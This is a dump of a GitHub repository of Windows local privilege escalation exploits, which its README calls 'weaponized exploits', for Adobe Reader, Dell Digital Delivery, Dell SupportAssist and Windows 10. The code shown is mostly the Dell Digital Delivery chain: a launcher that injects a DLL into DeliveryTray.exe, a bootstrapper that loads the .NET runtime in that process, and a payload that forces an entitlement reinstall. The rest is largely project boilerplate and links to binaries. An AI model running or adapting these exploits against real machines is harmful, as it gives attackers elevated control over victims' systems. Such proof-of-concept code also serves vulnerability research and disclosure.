├── cve20155090 ├── cve20155090.v12.suo ├── resources │ ├── AdobeARM.exe │ └── asdf.ini ├── resources.rc ├── cve20155090 │ ├── cve20155090.vcxproj.user │ ├── stdafx.cpp │ ├── targetver.h │ ├── stdafx.h │ ├── cve20155090.vcxproj.filters │ ├── ReadMe.txt │ ├── cve20155090.vcxproj │ └── cve20155090.cpp └── cve20155090.sln ├── cve20211648 ├── x64 │ └── Release │ │ └── CreateDC.exe ├── splpoc │ ├── splpoc.vcxproj.user │ ├── splpoc.vcxproj.filters │ ├── splpoc.vcxproj │ └── splpoc.cpp └── splpoc.sln ├── dell-support-assist ├── pcdsrvc_x64.pkms └── dell-sa-lpe.cpp ├── cve-2018-11072 ├── src │ ├── Bootstrapper │ │ ├── stdafx.h │ │ ├── targetver.h │ │ ├── dllmain.h │ │ ├── Bootstrapper.h │ │ ├── dllmain.cpp │ │ ├── Bootstrapper.vcxproj.filters │ │ ├── Bootstrapper.cpp │ │ └── Bootstrapper.vcxproj │ ├── Launcher │ │ ├── targetver.h │ │ ├── Injection.h │ │ ├── Launcher.vcxproj.filters │ │ ├── Launcher.cpp │ │ ├── Launcher.vcxproj │ │ ├── HCommonEnsureCleanup.h │ │ └── Injection.cpp │ ├── readme.md │ └── ExampleProject │ │ ├── Example.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ └── ExampleProject.csproj ├── LICENSE ├── .gitignore └── SharpNeedle.sln ├── README.md └── LICENSE /cve20155090/cve20155090.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hatRiot/bugs/HEAD/cve20155090/cve20155090.v12.suo -------------------------------------------------------------------------------- /cve20155090/resources/AdobeARM.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hatRiot/bugs/HEAD/cve20155090/resources/AdobeARM.exe -------------------------------------------------------------------------------- /cve20155090/resources/asdf.ini: -------------------------------------------------------------------------------- 1 | [Startup] 2 | RequireMSI=3.0 3 | 4 | [Product] 5 | msi=C:\Windows\Temp\slksdDSFdf\asdf.msi -------------------------------------------------------------------------------- /cve20211648/x64/Release/CreateDC.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hatRiot/bugs/HEAD/cve20211648/x64/Release/CreateDC.exe -------------------------------------------------------------------------------- /dell-support-assist/pcdsrvc_x64.pkms: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hatRiot/bugs/HEAD/dell-support-assist/pcdsrvc_x64.pkms -------------------------------------------------------------------------------- /cve20155090/resources.rc: -------------------------------------------------------------------------------- 1 | 100 RCDATA "resources\\asdf.ini" 2 | 200 RCDATA "resources\\asdf.msi" 3 | 300 RCDATA "resources\\AdobeARM.exe" -------------------------------------------------------------------------------- /cve20211648/splpoc/splpoc.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /cve20155090/cve20155090/cve20155090.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Bootstrapper/stdafx.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "targetver.h" 4 | 5 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 6 | #include 7 | 8 | #include "Bootstrapper.h" 9 | -------------------------------------------------------------------------------- /cve20155090/cve20155090/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // cve20155090.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /cve20155090/cve20155090/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Launcher/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Bootstrapper/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /cve20155090/cve20155090/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Bootstrapper/dllmain.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "stdafx.h" 4 | #include 5 | 6 | /** 7 | * Displays the pid of the current process. 8 | * Mainly included for debugging purposes. 9 | */ 10 | void DisplayPid(); 11 | 12 | /** 13 | * Dll entry point. 14 | */ 15 | BOOL APIENTRY DllMain( HMODULE hModule, 16 | DWORD ul_reason_for_call, 17 | LPVOID lpReserved 18 | ); 19 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Bootstrapper/Bootstrapper.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "stdafx.h" 3 | #include 4 | #pragma comment(lib, "mscoree.lib") 5 | 6 | // For exporting functions without name-mangling 7 | #define DllExport extern "C" __declspec( dllexport ) 8 | 9 | // Our sole export for the time being 10 | DllExport void LoadManagedProject(const wchar_t * managedDllLocation); 11 | 12 | // Not exporting, so go ahead and name-mangle 13 | ICLRRuntimeHost* StartCLR(LPCWSTR dotNetVersion); 14 | -------------------------------------------------------------------------------- /cve-2018-11072/src/readme.md: -------------------------------------------------------------------------------- 1 | # Project Structure 2 | 3 | ### Launcher.exe (native) 4 | 5 | This injects Bootstrapper.dll into the specified process, then invokes one if its functions. 6 | 7 | ### Bootstrapper.dll (native) 8 | 9 | This is the first dll to be injected. When invoked, this attaches to the CLR (v4.0), loads 10 | ExampleProject.dll using it, and lastly invokes the main method of ExampleProject. 11 | 12 | ### ExampleProject.dll (managed) 13 | 14 | This is the managed project, which is injected second. You must preserve the signature of the 15 | entry method, but this project can otherwise modified to do whatever you wish. Since it is in 16 | the target process' memory space, pointers can be used to access the target's data structures. 17 | (Either via P/Invoke or unsafe code blocks.) 18 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Bootstrapper/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include 3 | 4 | #include "dllmain.h" 5 | 6 | BOOL APIENTRY DllMain( HMODULE hModule, 7 | DWORD ul_reason_for_call, 8 | LPVOID lpReserved 9 | ) 10 | { 11 | switch (ul_reason_for_call) 12 | { 13 | case DLL_PROCESS_ATTACH: 14 | //DisplayPid(); 15 | case DLL_THREAD_ATTACH: 16 | case DLL_THREAD_DETACH: 17 | case DLL_PROCESS_DETACH: 18 | break; 19 | } 20 | 21 | return TRUE; 22 | } 23 | 24 | void DisplayPid() 25 | { 26 | DWORD pid = GetCurrentProcessId(); 27 | wchar_t buf[64]; 28 | wsprintf(buf, L"Hey, it worked! Pid is %d", pid); 29 | 30 | MessageBox(NULL, buf, L"Injected MessageBox", NULL); 31 | } 32 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bugs 2 | 3 | Public proof of concepts/bugs/weaponized exploits/etc. etc. 4 | 5 | ## CVE-2015-5090 6 | Adobe Reader/Acrobat Pro privilege escalation in <= 11.0.10. 7 | 8 | ## CVE-2018-11072 9 | Dell Digital Delivery LPE. Using the PoC, you'll need to drop a DLL under the appropriate entitlement folder in %ProgramData%. The included PoC simply triggers the entitlement reinstallation (see ExampleProject project in the solution). Note I use SharpNeedle project to do the code injection, and had to hack around a few bugs. 10 | 11 | ## dell-support-assist 12 | CVE-2018-XXX LPE in Dell/PC-Doctor SupportAssist kernel driver < 2.2 13 | http://hatriot.github.io/2018/05/17/dell-supportassist-local-privilege-escalation/ 14 | 15 | ## CVE-2021-1648 16 | Windows 10 LPE, adopted from Google Project Zero's public PoC 17 | http://dronesec.pw/2021/03/10/on-exploiting-cve-2021-1648/ 18 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Launcher/Injection.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | /* Given a cstring, returns the pid of a running executable, or NULL if the 7 | * executable was not found. In the case of multiple executables, returns 8 | * the first one found. 9 | */ 10 | DWORD GetProcessIdByName(const char * name); 11 | 12 | /* Injects the specified dll into a running process, calls a specific 13 | * method on that dll, then unloads the dll. 14 | */ 15 | BOOL InjectAndRunThenUnload(DWORD processId, const char * dllName, const std::string& ExportName, const wchar_t * ExportArgument); 16 | 17 | /* Given a pid, a dll name, and a method name, walks the export address 18 | * table then calls the named method. 19 | */ 20 | DWORD CallExport(DWORD ProcId, const std::string& ModuleName, const std::string& ExportName, const wchar_t * ExportArgument); 21 | -------------------------------------------------------------------------------- /cve-2018-11072/src/ExampleProject/Example.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using Dell.NamedPipe; 4 | using System.Security; 5 | 6 | namespace ExampleProject 7 | { 8 | [SecuritySafeCritical] 9 | public class Example 10 | { 11 | [SecuritySafeCritical] 12 | public static int EntryPoint(string pwzArgument) 13 | { 14 | try 15 | { 16 | PipeServiceClient client = new PipeServiceClient(); 17 | client.Initialize(); 18 | 19 | while (PipeServiceClient.AppState == AppState.Initializing) 20 | System.Threading.Thread.Sleep(1000); 21 | 22 | EntitlementUiWrapper entitle = PipeServiceClient.EntitlementList[0]; 23 | PipeServiceClient.ReInstallEntitlement(entitle.ID, false); 24 | System.Threading.Thread.Sleep(30000); 25 | 26 | PipeServiceClient.CloseConnection(); 27 | } 28 | catch(Exception e){} 29 | return 0; 30 | } 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /cve20155090/cve20155090.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2013 4 | VisualStudioVersion = 12.0.31101.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve20155090", "cve20155090\cve20155090.vcxproj", "{25D8E539-BD93-4537-9DBF-187F68395F49}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Release|Win32 = Release|Win32 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {25D8E539-BD93-4537-9DBF-187F68395F49}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {25D8E539-BD93-4537-9DBF-187F68395F49}.Debug|Win32.Build.0 = Debug|Win32 16 | {25D8E539-BD93-4537-9DBF-187F68395F49}.Release|Win32.ActiveCfg = Release|Win32 17 | {25D8E539-BD93-4537-9DBF-187F68395F49}.Release|Win32.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /cve20211648/splpoc/splpoc.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 bryan alexander 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /cve-2018-11072/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2013, Chad Zawistowski 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | * Redistributions of source code must retain the above copyright 7 | notice, this list of conditions and the following disclaimer. 8 | * Redistributions in binary form must reproduce the above copyright 9 | notice, this list of conditions and the following disclaimer in the 10 | documentation and/or other materials provided with the distribution. 11 | 12 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 13 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 14 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 15 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY 16 | DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 17 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 18 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND 19 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 20 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 21 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 22 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Launcher/Launcher.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /cve20211648/splpoc.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30523.141 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "splpoc", "splpoc\splpoc.vcxproj", "{A1C6E0C9-E078-477A-864B-7E2D435F6DCB}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {A1C6E0C9-E078-477A-864B-7E2D435F6DCB}.Debug|x64.ActiveCfg = Debug|x64 17 | {A1C6E0C9-E078-477A-864B-7E2D435F6DCB}.Debug|x64.Build.0 = Debug|x64 18 | {A1C6E0C9-E078-477A-864B-7E2D435F6DCB}.Debug|x86.ActiveCfg = Debug|Win32 19 | {A1C6E0C9-E078-477A-864B-7E2D435F6DCB}.Debug|x86.Build.0 = Debug|Win32 20 | {A1C6E0C9-E078-477A-864B-7E2D435F6DCB}.Release|x64.ActiveCfg = Release|x64 21 | {A1C6E0C9-E078-477A-864B-7E2D435F6DCB}.Release|x64.Build.0 = Release|x64 22 | {A1C6E0C9-E078-477A-864B-7E2D435F6DCB}.Release|x86.ActiveCfg = Release|Win32 23 | {A1C6E0C9-E078-477A-864B-7E2D435F6DCB}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {7146B4AB-376F-422C-BCD9-17DCA7272BA4} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Bootstrapper/Bootstrapper.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /cve20155090/cve20155090/cve20155090.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | 37 | 38 | Resource Files 39 | 40 | 41 | -------------------------------------------------------------------------------- /cve-2018-11072/src/ExampleProject/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | using System.Security; 5 | 6 | // General Information about an assembly is controlled through the following 7 | // set of attributes. Change these attribute values to modify the information 8 | // associated with an assembly. 9 | [assembly: AssemblyTitle("ExampleProject")] 10 | [assembly: AssemblyDescription("")] 11 | [assembly: AssemblyConfiguration("")] 12 | [assembly: AssemblyCompany("")] 13 | [assembly: AssemblyProduct("ExampleProject")] 14 | [assembly: AssemblyCopyright("Copyright © 2013")] 15 | [assembly: AssemblyTrademark("")] 16 | [assembly: AssemblyCulture("")] 17 | 18 | // Setting ComVisible to false makes the types in this assembly not visible 19 | // to COM components. If you need to access a type in this assembly from 20 | // COM, set the ComVisible attribute to true on that type. 21 | [assembly: ComVisible(false)] 22 | 23 | // The following GUID is for the ID of the typelib if this project is exposed to COM 24 | [assembly: Guid("56f092c5-a229-44ee-8862-f8d33761ffcb")] 25 | 26 | // Version information for an assembly consists of the following four values: 27 | // 28 | // Major Version 29 | // Minor Version 30 | // Build Number 31 | // Revision 32 | // 33 | // You can specify all the values or you can default the Build and Revision Numbers 34 | // by using the '*' as shown below: 35 | // [assembly: AssemblyVersion("1.0.*")] 36 | [assembly: AssemblyVersion("1.0.0.0")] 37 | [assembly: AssemblyFileVersion("1.0.0.0")] 38 | [assembly: AllowPartiallyTrustedCallers] 39 | -------------------------------------------------------------------------------- /cve20155090/cve20155090/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : cve20155090 Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this cve20155090 application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your cve20155090 application. 9 | 10 | 11 | cve20155090.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | cve20155090.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | cve20155090.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named cve20155090.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Launcher/Launcher.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include "Injection.h" 8 | 9 | using namespace std; 10 | 11 | DWORD LoadDeliveryTray(); 12 | 13 | void true_main() { 14 | // Bootstrapper 15 | char DllName[MAX_PATH]; 16 | GetCurrentDirectoryA(MAX_PATH, DllName); 17 | strcat_s(DllName, "\\Bootstrapper.dll"); 18 | 19 | // ExampleProject 20 | wchar_t DllNameW[MAX_PATH]; 21 | GetCurrentDirectory(MAX_PATH, DllNameW); 22 | wcscat_s(DllNameW, L"\\ExampleProject.dll"); 23 | 24 | DWORD Pid = GetProcessIdByName("DeliveryTray.exe"); 25 | if (Pid == NULL) 26 | // couldn't find it, load 27 | Pid = LoadDeliveryTray(); 28 | 29 | InjectAndRunThenUnload(Pid, DllName, "LoadManagedProject", DllNameW); 30 | } 31 | 32 | // assuming you're running on an x64 machine, update the path if x86.. 33 | DWORD LoadDeliveryTray() 34 | { 35 | STARTUPINFO si; 36 | PROCESS_INFORMATION pi; 37 | DWORD dwPid; 38 | 39 | ZeroMemory(&si, sizeof(si)); 40 | si.cb = sizeof(si); 41 | ZeroMemory(&pi, sizeof(pi)); 42 | 43 | if (!CreateProcess(L"C:\\Program Files (x86)\\Dell Digital Delivery\\DeliveryTray.exe", 44 | L"C:\\Program Files (x86)\\Dell Digital Delivery\\DeliveryTray.exe", 45 | NULL, NULL, false, CREATE_BREAKAWAY_FROM_JOB, NULL, NULL, 46 | &si, &pi)) { 47 | printf("Couldn't find DeliveryTray.exe?\n"); 48 | dwPid = NULL; 49 | } 50 | else 51 | dwPid = pi.dwProcessId; 52 | 53 | return dwPid; 54 | } 55 | 56 | /* By starting as a Windows application but not displaying any 57 | * windows, we can become effectively invisible. 58 | */ 59 | int __stdcall WinMain (HINSTANCE hInstance, 60 | HINSTANCE hPrevInstance, 61 | LPSTR lpCmdLine, 62 | int cmdShow) 63 | { 64 | true_main(); 65 | return 0; 66 | } 67 | 68 | /* In any case, it's useful to have a console window visible 69 | * for debugging purposes. Use cout to your heart's content! 70 | */ 71 | int main() 72 | { 73 | true_main(); 74 | return 0; 75 | } 76 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Bootstrapper/Bootstrapper.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include 3 | #include 4 | #pragma comment(lib, "mscoree.lib") 5 | 6 | #include "Bootstrapper.h" 7 | 8 | DllExport void LoadManagedProject(const wchar_t * managedDllLocation) 9 | { 10 | HRESULT hr; 11 | 12 | // Secure a handle to the CLR v4.0 13 | ICLRRuntimeHost* pClr = StartCLR(L"v4.0.30319"); 14 | if (pClr != NULL) 15 | { 16 | DWORD result; 17 | hr = pClr->ExecuteInDefaultAppDomain( 18 | managedDllLocation, 19 | L"ExampleProject.Example", 20 | L"EntryPoint", 21 | L"Argument", 22 | &result); 23 | } 24 | } 25 | 26 | ICLRRuntimeHost* StartCLR(LPCWSTR dotNetVersion) 27 | { 28 | HRESULT hr; 29 | 30 | ICLRMetaHost* pClrMetaHost = NULL; 31 | ICLRRuntimeInfo* pClrRuntimeInfo = NULL; 32 | ICLRRuntimeHost* pClrRuntimeHost = NULL; 33 | 34 | // Get the CLRMetaHost that tells us about .NET on this machine 35 | hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (LPVOID*)&pClrMetaHost); 36 | if (hr == S_OK) 37 | { 38 | // Get the runtime information for the particular version of .NET 39 | hr = pClrMetaHost->GetRuntime(dotNetVersion, IID_PPV_ARGS(&pClrRuntimeInfo)); 40 | if (hr == S_OK) 41 | { 42 | // Check if the specified runtime can be loaded into the process. This 43 | // method will take into account other runtimes that may already be 44 | // loaded into the process and set pbLoadable to TRUE if this runtime can 45 | // be loaded in an in-process side-by-side fashion. 46 | BOOL fLoadable; 47 | hr = pClrRuntimeInfo->IsLoadable(&fLoadable); 48 | if ((hr == S_OK) && fLoadable) 49 | { 50 | // Load the CLR into the current process and return a runtime interface 51 | // pointer. 52 | hr = pClrRuntimeInfo->GetInterface(CLSID_CLRRuntimeHost, 53 | IID_PPV_ARGS(&pClrRuntimeHost)); 54 | 55 | // bja hack: we know we're injecting into a .NET app, so don't try to start running the runtime. contrary 56 | // to the comment below, it doesn't work. 57 | return pClrRuntimeHost; 58 | 59 | if (hr == S_OK) 60 | { 61 | // Start it. This is okay to call even if the CLR is already running 62 | hr = pClrRuntimeHost->Start(); 63 | if (hr == S_OK) 64 | { 65 | // Success! 66 | return pClrRuntimeHost; 67 | } 68 | 69 | } 70 | } 71 | } 72 | } 73 | 74 | // Cleanup if failed 75 | if (pClrRuntimeHost) 76 | { 77 | pClrRuntimeHost->Release(); 78 | pClrRuntimeHost = NULL; 79 | } 80 | if (pClrRuntimeInfo) 81 | { 82 | pClrRuntimeInfo->Release(); 83 | pClrRuntimeInfo = NULL; 84 | } 85 | if (pClrMetaHost) 86 | { 87 | pClrMetaHost->Release(); 88 | pClrMetaHost = NULL; 89 | } 90 | 91 | return NULL; 92 | } 93 | -------------------------------------------------------------------------------- /cve-2018-11072/.gitignore: -------------------------------------------------------------------------------- 1 | ################# 2 | ## Eclipse 3 | ################# 4 | *.pydevproject 5 | .project 6 | .metadata 7 | bin/ 8 | tmp/ 9 | *.tmp 10 | *.bak 11 | *.swp 12 | *~.nib 13 | local.properties 14 | .classpath 15 | .settings/ 16 | .loadpath 17 | 18 | # External tool builders 19 | .externalToolBuilders/ 20 | 21 | # Locally stored "Eclipse launch configurations" 22 | *.launch 23 | 24 | # CDT-specific 25 | .cproject 26 | 27 | # PDT-specific 28 | .buildpath 29 | 30 | 31 | ################# 32 | ## Visual Studio 33 | ################# 34 | 35 | ## Ignore Visual Studio temporary files, build results, and 36 | ## files generated by popular Visual Studio add-ons. 37 | 38 | # User-specific files 39 | *.suo 40 | *.user 41 | *.sln.docstates 42 | *.opendb 43 | 44 | # Build results 45 | [Dd]ebug/ 46 | [Rr]elease/ 47 | *_i.c 48 | *_p.c 49 | *.ilk 50 | *.meta 51 | *.obj 52 | *.pch 53 | *.pdb 54 | *.pgc 55 | *.pgd 56 | *.rsp 57 | *.sbr 58 | *.tlb 59 | *.tli 60 | *.tlh 61 | *.tmp 62 | *.vspscc 63 | .builds 64 | *.dotCover 65 | 66 | ## TODO: If you have NuGet Package Restore enabled, uncomment this 67 | #packages/ 68 | 69 | # Visual C++ cache files 70 | ipch/ 71 | *.aps 72 | *.ncb 73 | *.opensdf 74 | *.sdf 75 | 76 | # Visual Studio profiler 77 | *.psess 78 | *.vsp 79 | 80 | # ReSharper is a .NET coding add-in 81 | _ReSharper* 82 | 83 | # Installshield output folder 84 | [Ee]xpress 85 | 86 | # DocProject is a documentation generator add-in 87 | DocProject/buildhelp/ 88 | DocProject/Help/*.HxT 89 | DocProject/Help/*.HxC 90 | 